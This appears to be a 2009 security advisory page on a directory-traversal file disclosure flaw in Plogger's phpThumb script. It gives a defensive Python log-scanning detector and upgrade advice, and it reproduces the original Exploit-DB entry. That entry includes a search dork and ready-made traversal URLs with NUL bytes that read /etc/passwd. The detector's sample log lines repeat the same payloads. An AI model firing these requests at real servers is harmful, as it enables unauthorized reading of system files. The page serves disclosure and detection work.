Vendor: Plogger
By: Mr.tro0oqy
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Disclosure
CWE: 22
Product Name: Plogger
Affected Version From: Prior to 1.0.2
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: plogger
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Plogger Remote File Disclosure Vulnerability

Plogger is vulnerable to a remote file disclosure vulnerability due to insufficient sanitization of user-supplied input in the bundled phpThumb script (plog-includes/lib/phpthumb/phpThumb.php). An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server: the 'src' parameter is passed directly to fopen(), and the 'w' and 'h' parameters are likewise taken from the request unchecked, so a directory traversal sequence terminated with a NUL byte (%00) in any of these parameters lets an attacker read arbitrary files from the server. This vulnerability affects Plogger versions prior to 1.0.2.

Mitigation:

Upgrade to Plogger version 1.0.2 or later.
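Until the upgrade is in place, requests matching this pattern are easy to spot in web server access logs. The following detection script is an added example written for this page, not code from Plogger, phpThumb or the advisory author; it assumes Apache/nginx combined log format, and the log lines it scans are constructed samples that mirror the request shape described above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters phpThumb.php reads straight from the request (per the advisory).
WATCHED_PARAMS = ("src", "w", "h")
# "../" or "..\" as a path component, anywhere in the value.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Minimal combined-log parser: client IP, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3})"
)

# Constructed sample log lines (hypothetical hosts, RFC 5737 test addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2009:12:00:01 +0000] "GET /gallery/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1523',
    '198.51.100.7 - - [10/Sep/2009:12:00:02 +0000] "GET /gallery/plog-includes/lib/phpthumb/phpThumb.php?src=images/holiday.jpg&w=200 HTTP/1.1" 200 48211',
    '203.0.113.5 - - [10/Sep/2009:12:00:03 +0000] "GET /gallery/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1523',
    '198.51.100.9 - - [10/Sep/2009:12:00:04 +0000] "GET /gallery/index.php?level=picture&id=../../etc/passwd HTTP/1.1" 404 210',
]


def suspicious_params(target: str) -> list:
    """Return the names of src/w/h parameters that carry a traversal
    sequence or a NUL byte in a request to phpThumb.php."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/phpthumb.php"):
        return []
    hits = []
    # parse_qs percent-decodes once, so %00 becomes a literal NUL character.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        if any("\x00" in v or TRAVERSAL.search(v) for v in values):
            hits.append(name)
    return hits


def scan_log(lines) -> list:
    """Return (client_ip, status, flagged_params) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = suspicious_params(m.group("target"))
        if params:
            findings.append((m.group("ip"), int(m.group("status")), params))
    return findings


if __name__ == "__main__":
    for ip, status, params in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} params={','.join(params)}")
```

A status of 200 on a flagged request is the case worth escalating, since it indicates the file content was actually returned rather than the request being rejected.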
Source

Exploit-DB raw data:

# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker) 
# email : t.4@windowslive.com

exp : 

Line 117:   if ($fp_source = @fopen($_GET['src'],'rb'))

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00

Line 41: 	$_GET['w'] = $matches[1];
Line 42: 	$_GET['h'] = $matches[2];

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00


greetz : all Muslims (Ramadan Kareem)